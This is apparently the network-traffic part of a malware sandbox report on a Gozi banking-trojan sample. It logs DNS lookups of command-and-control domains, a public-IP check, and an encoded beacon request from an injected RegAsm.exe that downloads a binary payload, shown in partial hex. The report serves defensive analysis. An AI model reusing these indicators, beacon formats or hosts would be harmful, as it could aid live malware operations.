Jan 12, 2022 13:02:07.061264992 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.061306000 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.061310053 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.061359882 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.061429977 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.061479092 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.061609030 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.061647892 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.062535048 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.109632015 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.109684944 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.109723091 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.109781981 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.110892057 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.110951900 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.110976934 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.110991001 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111062050 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.111090899 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111263990 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111305952 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111351967 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.111418009 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111460924 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.111530066 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111673117 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111788988 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111838102 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.111916065 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.111959934 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.112102985 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.112150908 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.112164974 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.112202883 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.112206936 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.112287998 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.112371922 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.112415075 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.112648964 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.112701893 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.112723112 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.112812996 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113104105 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113146067 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113157034 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.113202095 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113215923 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.113244057 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113322020 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.113364935 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113540888 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113591909 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113610029 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.113640070 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.113905907 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.113965988 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.114008904 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.114027023 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.114054918 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.114094019 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.114139080 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.114185095 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.114301920 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.114653111 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.114717960 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.163526058 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.163655996 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.163717031 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.163816929 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.163861036 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.163991928 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164033890 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164201975 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164242983 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164244890 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.164288998 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.164516926 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164572001 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164669991 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164711952 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.164846897 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164887905 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.164889097 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.164928913 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.165115118 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.165184975 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.165227890 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.165241003 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.165482998 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.165528059 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.165570974 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.165699959 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.165740967 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.166038990 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.166134119 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.166173935 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.166214943 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.166376114 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.166419029 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.166503906 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.166616917 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.166846037 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.166893959 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.167191029 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.167237043 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.167247057 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.167666912 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.167707920 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.167747021 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.167758942 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.167787075 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.216784954 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.216850996 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.216893911 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.216923952 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.216932058 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.217004061 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.217047930 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.217158079 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.217197895 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.217200041 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.217578888 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.217681885 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.217727900 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.217837095 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.217879057 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.218105078 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.218143940 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.218713999 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.218761921 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.218786001 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.218825102 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.218835115 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.218920946 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.219140053 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.219182968 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.219183922 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.219222069 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.219376087 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.219516993 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.219598055 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.219638109 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.219640970 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.219676971 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.219753027 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.219954014 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.220069885 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.220112085 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.220123053 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.220150948 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.220170975 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.220206022 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.222304106 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.274578094 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.595938921 CET	49754	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.648668051 CET	80	49754	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.651251078 CET	49754	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:08.088711023 CET	49754	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:08.181587934 CET	80	49754	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:08.576595068 CET	80	49754	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:08.576649904 CET	80	49754	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:08.576838017 CET	49754	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:08.588793039 CET	49754	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:08.640880108 CET	80	49754	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:09.050379992 CET	49820	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:09.103095055 CET	80	49820	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:09.103277922 CET	49820	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:09.103338957 CET	49820	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:09.196538925 CET	80	49820	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:09.595227957 CET	80	49820	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:09.595376015 CET	49820	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:09.595524073 CET	49820	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:09.648278952 CET	80	49820	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:10.457051039 CET	49822	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:10.510629892 CET	80	49822	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:10.510771036 CET	49822	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:10.510874987 CET	49822	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:10.510899067 CET	49822	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:10.564543962 CET	80	49822	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:10.981787920 CET	80	49822	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:10.981890917 CET	80	49822	185.189.12.123	192.168.2.3
Jan 12, 2022 13:04:10.982028008 CET	49822	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:10.982134104 CET	49822	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:04:11.036290884 CET	80	49822	185.189.12.123	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2022 13:01:26.007392883 CET	58045	53	192.168.2.3	8.8.8.8
Jan 12, 2022 13:01:26.027983904 CET	53	58045	8.8.8.8	192.168.2.3
Jan 12, 2022 13:02:04.562076092 CET	53910	53	192.168.2.3	8.8.8.8
Jan 12, 2022 13:02:04.851654053 CET	53	53910	8.8.8.8	192.168.2.3
Jan 12, 2022 13:02:05.952825069 CET	64021	53	192.168.2.3	8.8.8.8
Jan 12, 2022 13:02:06.290199995 CET	53	64021	8.8.8.8	192.168.2.3
Jan 12, 2022 13:02:07.574466944 CET	51143	53	192.168.2.3	8.8.8.8
Jan 12, 2022 13:02:07.593240023 CET	53	51143	8.8.8.8	192.168.2.3
Jan 12, 2022 13:03:34.439510107 CET	57106	53	192.168.2.3	8.8.8.8
Jan 12, 2022 13:03:34.455827951 CET	53	57106	8.8.8.8	192.168.2.3
Jan 12, 2022 13:03:34.462347031 CET	57107	53	192.168.2.3	208.67.222.222
Jan 12, 2022 13:03:34.478815079 CET	53	57107	208.67.222.222	192.168.2.3
Jan 12, 2022 13:03:34.480639935 CET	57108	53	192.168.2.3	208.67.222.222
Jan 12, 2022 13:03:34.497318983 CET	53	57108	208.67.222.222	192.168.2.3
Jan 12, 2022 13:03:34.537194967 CET	57109	53	192.168.2.3	208.67.222.222
Jan 12, 2022 13:03:34.553971052 CET	53	57109	208.67.222.222	192.168.2.3
Jan 12, 2022 13:04:08.717624903 CET	60352	53	192.168.2.3	8.8.8.8
Jan 12, 2022 13:04:09.045696974 CET	53	60352	8.8.8.8	192.168.2.3
Jan 12, 2022 13:04:10.129266977 CET	56773	53	192.168.2.3	8.8.8.8
Jan 12, 2022 13:04:10.455682039 CET	53	56773	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 12, 2022 13:01:26.007392883 CET	192.168.2.3	8.8.8.8	0x2e83	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Jan 12, 2022 13:02:04.562076092 CET	192.168.2.3	8.8.8.8	0xbd4b	Standard query (0)	apr.intooltak.com	A (IP address)	IN (0x0001)
Jan 12, 2022 13:02:05.952825069 CET	192.168.2.3	8.8.8.8	0xfefc	Standard query (0)	apr.intooltak.com	A (IP address)	IN (0x0001)
Jan 12, 2022 13:02:07.574466944 CET	192.168.2.3	8.8.8.8	0xe072	Standard query (0)	apr.intooltak.com	A (IP address)	IN (0x0001)
Jan 12, 2022 13:03:34.439510107 CET	192.168.2.3	8.8.8.8	0x398e	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Jan 12, 2022 13:03:34.462347031 CET	192.168.2.3	208.67.222.222	0x1	Standard query (0)	222.222.67.208.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Jan 12, 2022 13:03:34.480639935 CET	192.168.2.3	208.67.222.222	0x2	Standard query (0)	myip.opendns.com	A (IP address)	IN (0x0001)
Jan 12, 2022 13:03:34.537194967 CET	192.168.2.3	208.67.222.222	0x3	Standard query (0)	myip.opendns.com	28	IN (0x0001)
Jan 12, 2022 13:04:08.717624903 CET	192.168.2.3	8.8.8.8	0x16a8	Standard query (0)	io.immontyr.com	A (IP address)	IN (0x0001)
Jan 12, 2022 13:04:10.129266977 CET	192.168.2.3	8.8.8.8	0x802e	Standard query (0)	io.immontyr.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 12, 2022 13:01:26.027983904 CET	8.8.8.8	192.168.2.3	0x2e83	No error (0)	transfer.sh	144.76.136.153	A (IP address)	IN (0x0001)
Jan 12, 2022 13:02:04.851654053 CET	8.8.8.8	192.168.2.3	0xbd4b	No error (0)	apr.intooltak.com	185.189.12.123	A (IP address)	IN (0x0001)
Jan 12, 2022 13:02:06.290199995 CET	8.8.8.8	192.168.2.3	0xfefc	No error (0)	apr.intooltak.com	185.189.12.123	A (IP address)	IN (0x0001)
Jan 12, 2022 13:02:07.593240023 CET	8.8.8.8	192.168.2.3	0xe072	No error (0)	apr.intooltak.com	185.189.12.123	A (IP address)	IN (0x0001)
Jan 12, 2022 13:03:34.455827951 CET	8.8.8.8	192.168.2.3	0x398e	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Jan 12, 2022 13:03:34.478815079 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa		PTR (Pointer record)	IN (0x0001)
Jan 12, 2022 13:03:34.478815079 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa		PTR (Pointer record)	IN (0x0001)
Jan 12, 2022 13:03:34.478815079 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa		PTR (Pointer record)	IN (0x0001)
Jan 12, 2022 13:03:34.497318983 CET	208.67.222.222	192.168.2.3	0x2	No error (0)	myip.opendns.com	102.129.143.64	A (IP address)	IN (0x0001)
Jan 12, 2022 13:04:09.045696974 CET	8.8.8.8	192.168.2.3	0x16a8	No error (0)	io.immontyr.com	185.189.12.123	A (IP address)	IN (0x0001)
Jan 12, 2022 13:04:10.455682039 CET	8.8.8.8	192.168.2.3	0x802e	No error (0)	io.immontyr.com	185.189.12.123	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

transfer.sh

apr.intooltak.com

io.immontyr.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	144.76.136.153	443	C:\Users\user\Desktop\gozi.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49751	185.189.12.123	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2022 13:02:04.915314913 CET	1256	OUT	GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 Host: apr.intooltak.com
Jan 12, 2022 13:02:05.378786087 CET	1266	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 12 Jan 2022 12:02:05 GMT Content-Type: application/octet-stream Content-Length: 195218 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61dec33d54ba6.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 84 91 5f b3 bc a7 43 54 1c 07 96 2c 25 53 8b c0 d4 65 8e 47 72 8a bc f9 96 8d ae 96 e6 26 dc 35 d4 5f 62 95 04 48 68 79 78 fa 81 2b 27 60 66 17 05 94 66 7e d8 90 19 6e 37 39 ef 0f 96 07 39 c3 72 26 c4 c7 98 26 42 d2 88 12 a5 aa d4 fd 34 86 a5 60 ea 4e 28 60 14 b0 8e 3f 21 23 a2 2c 78 52 55 4c 58 03 87 ba a9 a6 ab a7 77 e1 a5 02 fb 6f ef 87 c0 40 01 7c ef a6 c8 98 d4 86 df 64 54 45 ef 38 ce 53 8c 27 c4 0a f6 24 b6 93 b2 f6 be 4d 6c 05 a4 96 55 80 6d 0e 06 21 fb 28 52 ef 66 b9 4f a0 8f c3 09 8c 7b 6e f0 60 5e 94 88 64 07 19 40 91 6b a1 79 d6 07 aa 51 c2 9e 56 e4 6a ec 15 26 e7 a3 10 e6 3f 30 a8 a4 94 39 93 59 71 fa 9c 88 70 09 0f 37 4f c8 d1 5e d3 7b 13 40 d1 e1 45 9c 33 84 15 f5 43 b1 59 13 21 fa 40 7a 18 e9 9e a9 66 8e ba 87 37 e8 71 54 da c3 bb dc 16 78 82 86 7e 76 94 b8 49 54 59 19 a5 33 70 34 f4 60 ac ac 5a 13 58 56 2f 6c b3 07 c2 f1 5d 89 d2 eb 7d ce db f4 60 00 ad 21 f8 71 61 fc e1 f9 0c cb 53 b5 32 2e 39 68 cf 47 fd af 1c 20 b8 68 bd 1d 44 50 ca 08 00 3e 3f c2 3e 9a 39 b5 f1 c1 e8 6d e1 9c de d1 f6 76 b2 45 fb 8c 04 e2 d9 ab f9 67 eb 82 f6 54 a2 df 23 6c 08 4b ab e7 de 3b 1f 69 fd 37 a0 89 8e a9 e6 a6 a9 e2 6d c2 aa 36 d9 c3 81 e9 97 4e eb 4d e2 74 7a 5e 90 94 20 49 11 da 44 0c eb 5f bf 90 97 5f 7b bd 5b 6d dd aa 52 6f ea de 50 9c ba 06 0c 8f 74 ce 41 8d 30 84 41 64 d8 8a 83 a6 e2 3f f2 ff f1 95 bb df 9e 2e b2 9f 15 52 c3 5c 72 ff c0 06 96 ea 8e d7 29 f5 0a 62 b3 28 86 9b c0 93 62 c3 e8 02 35 4a 4c 12 22 09 9a ac 4a f6 11 50 e9 e1 5a c5 73 0c eb 4a c3 5e 05 6b d4 a2 dc de ab 7a d8 e7 9d 4d 4e eb 94 40 a3 7f d2 a6 d6 10 7b 66 54 4d 54 68 ff ea 08 7f 29 c2 e3 4f 4c ff dc 42 7b 6e 24 ba dd d3 03 5c e3 ec bb 1b d7 ff 03 ed 90 54 d0 94 d3 2e 82 9b 82 92 39 cf 5b 2e a0 01 93 b3 e0 de e5 57 a9 fb 13 ee 53 04 fa b1 f7 2b 0a b3 05 83 c1 f5 39 71 34 06 87 5d 86 5a 58 d5 c2 98 ca c0 52 18 31 d4 9f 9c f3 86 58 52 af de e8 90 ff 91 ec 63 89 c4 4f 6f 40 ea a3 a1 30 06 ce 19 45 6d 7a 0a 0d 79 50 e4 fc e7 e5 b4 4c 8e 44 4f 32 92 b6 69 74 b7 13 b7 a2 e1 7d e2 c5 c8 22 06 ef 59 f6 49 e0 9e 1d 8b 18 b1 fe 5a d1 74 59 23 40 6b 50 ba 29 45 84 91 82 37 41 fa 0d cd 64 8a 2a 68 f0 00 9d 1f 6c f1 51 59 ef fa 4a 38 b2 01 00 71 79 ed 0e 11 e5 e6 3c f4 d7 68 54 9d ae 7f ba 82 c6 00 d6 ee 86 ca 63 45 d0 cd 8f 40 66 4a 56 3b 7a c4 8b a1 1d 02 98 71 9a ae db bc 47 4a 26 9a 17 fd 56 ed 38 b3 12 88 11 6e 2f cd 5a a0 f8 39 03 1b 26 a9 a3 d4 de 25 05 08 90 ef f8 7c 26 da 2a 53 4b a0 3f 77 91 e6 5a 5c 4d a5 33 bf f2 b4 4d e1 4f 98 0e 76 23 d8 ac 93 95 df 58 d5 a7 80 ba 86 d2 b5 ce 9c 93 d5 4a 45 04 6e 7a cf 8a dc 4a 64 96 e2 83 ef 0a 0e 9e 56 a0 77 74 84 39 e0 96 a6 28 69 e5 f3 b5 af 18 92 c9 bc cf aa 41 e7 16 97 58 a9 ea 92 54 6b 3f f2 16 13 a1 3c 7a 2d 5e a4 eb ab f6 47 6f f7 b4 c2 35 79 39 b5 6b 77 43 ee 2d 7f e7 ee 79 aa 1d b1 ca 79 Data Ascii: _CT,%SeGr&5_bHhyx+'`ff~n799r&&B4`N(`?!#,xRULXwo@\|dTE8S'$MlUm!(RfO{n`^d@kyQVj&?09Yqp7O^{@E3CY!@zf7qTx~vITY3p4`ZXV/l]}`!qaS2.9hG hDP>?>9mvEgT#lK;i7m6NMtz^ ID__{[mRoPtA0Ad?.R\r)b(b5JL"JPZsJ^kzMN@{fTMTh)OLB{n$\T.9[.WS+9q4]ZXR1XRcOo@0EmzyPLDO2it}"YIZtY#@kP)E7AdhlQYJ8qy<hTcE@fJV;zqGJ&V8n/Z9&%\|&SK?wZ\M3MOv#XJEnzJdVwt9(iAXTk?<z-^Go5y9kwC-yy
Jan 12, 2022 13:02:05.378896952 CET	1268	IN	Data Raw: 97 21 3c 7c e9 1c 33 5e 0c 4a a9 ee 48 4a f3 09 1e b0 1a c8 68 ba aa bd 9b 4f ea d6 06 e4 e5 a5 04 0e 6a 8f 0f 25 e3 69 8c 83 55 77 1b ba 04 ca 25 fe 83 1c bc b2 63 23 7f f4 94 99 ce e4 91 23 e7 ad d9 ee 7d 05 0f 8d 9b 19 aa 86 76 68 a9 12 91 38 Data Ascii: !<\|3^JHJhOj%iUw%c##}vh8bB\|[-_q(/SNpsPTO;v*)v/A_zzV.{u1j\,r#FkbZ4rSqKLV]0H"O>&PEz-GK5yQ7E^MOG
